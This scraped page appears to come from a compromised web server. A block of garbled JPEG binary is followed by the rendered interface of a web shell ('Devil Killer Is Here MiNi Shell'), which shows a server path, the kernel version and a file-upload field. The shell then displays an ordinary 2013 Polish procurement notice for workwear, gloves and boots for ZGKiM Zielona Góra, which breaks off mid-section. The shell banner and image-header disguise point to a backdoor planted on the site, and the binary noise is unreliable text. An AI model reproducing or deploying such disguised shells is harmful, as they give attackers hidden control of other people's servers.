JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/476538-N-2013.html

<p class="kh_header"><b>Zielona Góra: Dostawa ubrań roboczych, rękawic, butów dla ZGKiM w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 476538 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , Aleja Zjednoczenia 110, 65-005 Zielona Góra, woj. lubuskie, tel. (068) 322-91-86, faks (068) 322-91-84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgkim.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ubrań roboczych, rękawic, butów dla ZGKiM w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odzieży roboczej, rękawic oraz butów zgodnie z poniższym opisem:
A)Część I - zadanie 1 - dostawa odzieży roboczej
1.  UBRANIE LETNIE      kolor czerwony                                                             340 kpl 
Logo ZGKiM na sercu (kieszonka), na plecach i na bawecie (kieszonka)
Tkanina poliestrowo bawełniana (35/65),  czyli skład  ( bawełna 35% + poliester 65% )
gramatura: 245g/m2
BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5 cm rękawy wydłużone od PN o 4cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, z przodu odcinany karczek podkreślony niebieską wypustką, u góry dwie kieszenie naszywane z patkami zapinanymi na springi.
SPODNIE OGRODNICZKI - rozporek zapinany na guziki w kolorze czerwonym, regulacja tęgości w pasie, lewy bok na guziki i guma z tyłu, regulacja tęgości nogawki u dołu na guziki, na prawej nogawce calówka, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami, odcinany bawet podkreślony niebieską wypustką, na bawecie kieszeń zapinana na zamek,  w szelkach żakardowa taśma szelkowa.
Minimalny okres gwarancji wynosi 12 miesięcy. Wymagana deklaracja zgodności.
2. UBRANIE OCIEPLANE        kolor czerwony                                                     75 kpl 
Logo ZGKiM na sercu i na plecach
Tkanina poliestrowo bawełniana (35/65), czyli skład  ( bawełna 35% + poliester 65% )
gramatura: 245g/m2
BLUZA - zapinana na guziki w kolorze czerwonym kryte listwą, ocieplina pikówka 100g/m2, wewnątrz kurtki regulacja tęgości,  na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003 - zgodnie z deklaracją zgodności producenta, wzmocnienia na łokciach, w mankiecie guma, z przodu odcinany karczek podkreślony niebieską wypustką, u dołu dwie kieszenie naszywane z ozdobną niebieską lamówką.
SPODNIE DO PASA - rozporek zapinany na guziki w kolorze czerwonym , ocieplina pikówka 100g/m2 , regulacja tęgości w pasie na guziki, wzmocnienie w kroku i na kolanach, na prawej nogawce calówka, z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie z ozdobnymi niebieskimi lamówkami.
Minimalny okres gwarancji wynosi 36 miesięcy. Wymagana deklaracja zgodności.
3.   UBRANIE ROBOCZE GRANATOWE DLA MECHANIKÓW                       22 kpl
Logo ZGKiM na sercu (kieszonka), na plecach .
Tkanina poliestrowo bawełniana (35/65), czyli skład  ( bawełna 35% + poliester 65% )
gramatura: 245g/m2       
BLUZA zapinana na guziki kryte listwą , na plecach zakładki regulujące tęgość, w pasie guma regulująca tęgość szer. 5 cm, na rękawach podwójna taśma odblaskowa zgodna z normą PN-EN 471-CIOP nr 342/2003  - zgodnie z deklaracją zgodności producenta, mankiet zapinany na guzik, na dole dwie naszywane kieszenie, u góry dwie kieszenie naszywane z patkami zapinanymi na springi. 
SPODNIE DO PASA - rozporek zapinany na guziki ,regulacja tęgości w pasie na guziki, na prawej nogawce calówka, z tyłu po prawej stronie naszywana kieszeń, z przodu dwie naszywane kieszenie. 
Minimalny okres gwarancji wynosi 6 miesięcy. Wymagana deklaracja zgodności.
4.   UBRANIE ROBOCZE SPAWALNICZE                                                             8 kpl
Tkanina ks proban, 100% bawełna
BLUZA prosta, bez ściągaczy, zapinana na guziki kryte listwą, na sercu od wewnątrz naszywana kieszeń, u dołu po bokach dwie wpuszczane kieszenie.
SPODNIE DO PASA - rozporek zapinany na guziki, regulacja tęgości w pasie, z przodu dwie naszywane kieszenie, z boku prawej nogawki calówka.
Minimalny okres gwarancji wynosi 9 miesięcy. 
5.   KOSZULA FLANELOWA                                                                                  330 szt                    100% bawełna, splot płócienny, wątek luźno skręcony drukowana dwubarwnie. Zapinana na 6 guzików, na lewej piersi naszywana kieszeń. Rękawy zakończone mankietami zapinanymi na jeden guzik. Szwy wykończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy.
6. KALESONY                                                                                                            240 p                      

z miękkiej bawełny, jednostronnie czesanej o podwójnym wątku luźno skręconym. Guma w pasie, bawełniane ściągacze w nogawkach. Szwy zakończone overlockiem. Minimalny okres gwarancji wynosi 12 miesięcy. Kolor szary lub niebieski.
7.   LEGGINSY DAMSKIE                                                                                         20 szt.
z miękkiej bawełny, gramatura 160 , skład 92% bawełny , 8% lycra.8.   T-SHIRT                                                                                                                 480 szt.          
100% bawełny półczesanej, 150g/m2, elastyczny ściągacz, taśma wzmacniająca na ramionach, boki bezszwowe, podwójne szwy. Logo ZGKiM na sercu. Minimalny okres gwarancji wynosi 12 miesięcy.9. CZAPKA FIRMOWA                                                                                                                     
czapka z daszkiem, tkanina poliestrowo bawełniana (35/65), cztery otwory wentylacyjne, z tyłu plastikowa regulacja wielkości czapki. Minimalny okres gwarancji wynosi 12 miesięcy.
     -  kolor granatowy bez Loga Zakładu                                                                      14 szt 
     -  kolor czerwony z Logo Zakładu z przodu                                                             190 szt 10.   CZAPKA ZIMOWA                                                                                               80 szt                       
tkanina poliestrowo bawełniana (35/65), typu uszanka, z daszkiem, ocieplana, obszyta futerkiem, możliwość zapinania na napy u góry i dołu.  Logo Zakładu z przodu. Minimalny okres gwarancji wynosi 36 miesięcy.11.  UBRANIE PRZECIWDESZCZOWE                                                                  60 szt.
kurtka ? przeciwdeszczowa za zamek błyskawiczny oraz spodnie do pasa wykonane z tkaniny nylonowej , wewnątrz podgumowany. Wodoszczelne szwy, zapięcie na zamek błyskawiczny, kaptur chowany w kołnierzu - regulacja szerokości mankietu i nogawek poprzez plastikowe napy, dwie duże kieszenie pokryte plisą , dół kurtki ściągany  sznurkiem. Minimalny okres gwarancji wynosi 36 miesięcy.
12.  KURTKA OCIEPLANA                                                                                          25 szt.                        
z tkaniny poliestrowej powlekanej PCW w kolorze ciemnym . Zapinana na zamek błyskawiczny kryty plisą zapinaną na rzepy. Wyposażona  w kaptur chowany w stójce. Podszewka poliestowa pikowana. Możliwość odpięcia ocieplenia. Zalecana odporność mrozowa do -30 stopni Celsjusza. Minimalny okres gwarancji wynosi 36 miesięcy.
13.   FARTUCH  DLA SPRZĄTACZEK                                                                       7  szt.                                            
tkanina poliestrowo-bawełniana (65/35), gramatura: 245g/m2, zapinany na guziki kryte listwą, dwie dolne kieszenie naszywane, otwarte, dwie górne kieszenie naszywane z patkami zapinanymi na rzep, rękawy zakończone mankietami zapinanymi na guziki, z tyłu rozcięcie na długości ok. 30cm. Minimalny okres gwarancji wynosi 12 miesięcy.
14.  SKARPETY BAWAEŁNIANE MĘSKIE                                                                                                       -   zimowe kolor czarny lub ciemno stalowy                     20 p.                                                                 -   letnie kolor czarny lub ciemno stalowy                         15 p.
 
B)Część II - zadanie 2- dostawa rękawic roboczych 

1.   RĘKAWICE typu DRELICHOWE ROBOCZE                                                  
rękawice drelichowe z podszewką, 100% bawełna, pikowane, CE kat.1 - 1200 par

2.  RĘKAWICE NALEWANE typu GREIFER lub równoważne spełniające poniższe parametry                                                                                                                  
rękawice z tkaniny bawełnianej, powleczonej w ? szorstkowatym lateksem, z mankietem ze ściągaczem, do lekkich i średnio  ciężkich prac. CE kat.1 - 4000 par                         
 3.   RĘKAWICE typu NAKRAPIANE NA DZIANINIE  PCW  lub równoważne spełniające poniższe parametry:                                                                                                    rękawice bawełniane, dziane, nakrapiane pcw, do prostych i lekkich prac. CE kat.1 - 300 par                             
4.   RĘKAWICE OGRODNICZE typu WAMPIRKI lub równoważne spełniające poniższe parametry:                                                                                                                            
rękawice bawełniane, powlekane gumą w części chwytnej, do prostych i lekkich prac.      
CE kat.1 - 7000 par                                         
5.   RĘKAWICE DRELICHOWE OCIEPLANE typu WINTER DIMMER  lub równoważne spełniające poniższe parametry                                                          
rękawice z grubej dzianiny poliestrowej , ocieplina wewnętrz na całej powierzchni rękawicy, szorstkowata powierzchnia wewnętrzna zapewniająca  skuteczną izolację cieplną. Przedłużony ściągacz gwarantujący dobre przyleganie do nadgarstka. Dłonica powlekana podwójną warstwą lateksu spienionego dla poprawy izolacji i chwytności. 
CE kat. 1. - 800 par                                                                                            
6.   RĘKAWICE NITRYLOWE  typ 440Y                                                              15000 par
rękawice z dzianiny bawełnianej, powlekane ? lekkim nitrylem. Do prac lekkich i średnich. 
CE kat.1 
C)Część III - zadanie 3- dostawa obuwia roboczego 
Obuwie spełniające normę PN-EN-ISO 20344:2007 a w szczególności:

1.  OBUWIE ZIMOWE    ( dla elektromonterów )                                                        10 par
       Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry 
       naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.   
       Minimalny okres gwarancji wynosi 36 miesięcy.

2.   OBUWIE ZIMOWE   ( dla mechaników )                                                                 5 par
       Kategoria obuwia bezpiecznego S3,  Podnosek stalowy,  odporne na przebicie, wierzch skóry  
       naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
       Olejoodporne. Minimalny okres gwarancji wynosi 36  miesięcy.

3.   OBUWIE ZIMOWE  ( pozostałe )                                                                           50 par
      Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry 
      naturalne, wodoodporne, wysokość powyżej stawu skokowego, odporne na niską temperaturę.  
      Minimalny okres gwarancji wynosi 36 miesięcy.

4.    OBUWIE LETNIE ROBOCZE   ( dla elektromonterów )                                    15 par
       Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry  
       naturalne, wodoodporne, wysokość powyżej stawu skokowego. Minimalny okres  gwarancji 
       wynosi 12 miesięcy.

5.    OBUWIE LETNIE ROBOCZE  ( dla mechaników )                                            20 par
Kategoria obuwia bezpiecznego S3, odporne na przebicie. Podnosek stalowy, wierzch skóry 
       naturalne, wodoodporne, wysokość powyżej stawu skokowego. Olejoodporne. Minimalny okres 
       gwarancji wynosi 12 miesięcy.

6.    OBUWIE LETNIE ROBOCZE ( pozostałe )                                                       200 par
       Kategoria obuwia bezpiecznego S3, Podnosek stalowy, odporne na przebicie, wierzch skóry 
       naturalne, wodoodporne, wysokość powyżej stawu skokowego.  Minimalny okres gwarancji 
       wynosi 12 miesięcy.

7.   BUTY GUMOWE                                                                                                     90 par
      Buty robocze gumowe. Wysokość butów 37 cm. CE kat.2 EN 347-1. Wzór 6187 .                                    
      Minimalny okres gwarancji wynosi 12 miesięcy.

Zamawiający informuje, że wszystkie nazwy producenta występujące  w opisie przedmiotu zamówienia zostały podane przykładowo. Mogą być one zastąpione innymi, równoważnymi, pod warunkiem spełnienia przez oferowane produkty minimalnych wymaganych parametrów podanych w opisie. 

Pozostałe wymogi: 

1.   Dostawa sukcesywna w zależności od potrzeb zamawiającego w terminie :                                                 
   -  do 7 dni roboczych  w przypadku odzieży roboczej ( poz. od 1 do 4 poszczególnego asortymentu )
   -  do 3 dni roboczych w przypadku pozostałej odzieży  ( poz. od 5 do 14 poszczególnego asortymentu )
   -  do 3 dni roboczych w przypadku rękawic roboczych ( poz.1 - 6 asortymentu rękawic)
   -  do 3 dni roboczych w przypadku obuwia roboczego ( poz.1 - 7 asortymentu obuwia )
od złożenia konkretnego zamówienia przez Zamawiającego, transportem Wykonawcy i na koszt Wykonawcy.

2.    Faktury asortymentowo-ilościowo-wartościowe należy wystawić zgodnie ze złożonym zamówieniem.

3.    Należność za dostarczony towar będzie regulowana w terminie 30 dni od dnia dostarczenia towaru do zamawiającego.
4.    Wykonawcy ubiegający się o udzielenie zamówienia muszą przedstawić wzory całych ubrań wykazanych w specyfikacji poz .A.1, A.2, A.3. Wzory ubrań należy dołączyć do oferty, wraz z wymaganymi deklaracjami zgodności z normami wymaganymi przez Zamawiającego, lub z normami równoważnymi. 

5.   Wykonawcy ubiegający się o udzielenie zamówienia muszą przedstawić wzory rękawic roboczych wykazanych w specyfikacji poz.1 - 6 asortymentu rękawic

6. Wykonawca zobowiązany będzie złożyć deklaracje zgodności z normami wymaganymi przez Zamawiającego, lub z normami równoważnymi.  

7.   Asortyment ilościowy może ulec zmniejszeniu do 10% . Wykonawcy nie przysługują z tego tytułu żadne roszczenia.
Zdjęcia ubrań - część III siwz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.14.00.00-2, 18.14.10.00-9, 18.22.32.00-0, 18.44.33.00-9, 18.83.00.00-6, 18.81.60.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Spełnienie warunku będzie oceniane na podstawie podpisanego oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wg kryteriów  0 - 1, tj. nie spełnia/spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): -w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali: o W przypadku składania oferty na zadanie 1 - co najmniej 2 dostawy ubrań roboczych na kwotę w ramach każdej umowy min. 70 tyś. złotych brutto. oW przypadku składania oferty na zadanie 2 - co najmniej 2 dostawy rękawic roboczych na kwotę w ramach każdej umowy min. 40 tyś. złotych brutto.
o W przypadku składania oferty na zadanie 3 - co najmniej 2 dostawy butów roboczych na kwotę w ramach każdej umowy min. 30 tyś. złotych brutto.

W przypadku Wykonawcy składającego ofertę na więcej niż jedno zadanie, spełnieniem warunku będzie wykazanie się doświadczeniem na sumę rodzajową, ilościową i kwotową wykonanych dostaw.
Na potwierdzenie spełnienia warunku należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg załącznika do SIWZ. Spełnienie opisanego powyżej warunku będzie oceniane wg kryteriów  0 - 1, tj. nie spełnia/spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Spełnienie warunku będzie oceniane na podstawie podpisanego oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wg kryteriów  0 - 1, tj. nie spełnia/spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Spełnienie warunku będzie oceniane na podstawie podpisanego oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wg kryteriów  0 - 1, tj. nie spełnia/spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Spełnienie warunku będzie oceniane na podstawie podpisanego oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wg kryteriów  0 - 1, tj. nie spełnia/spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony umowy dopuszczają zmianę następujących postanowień umownych:
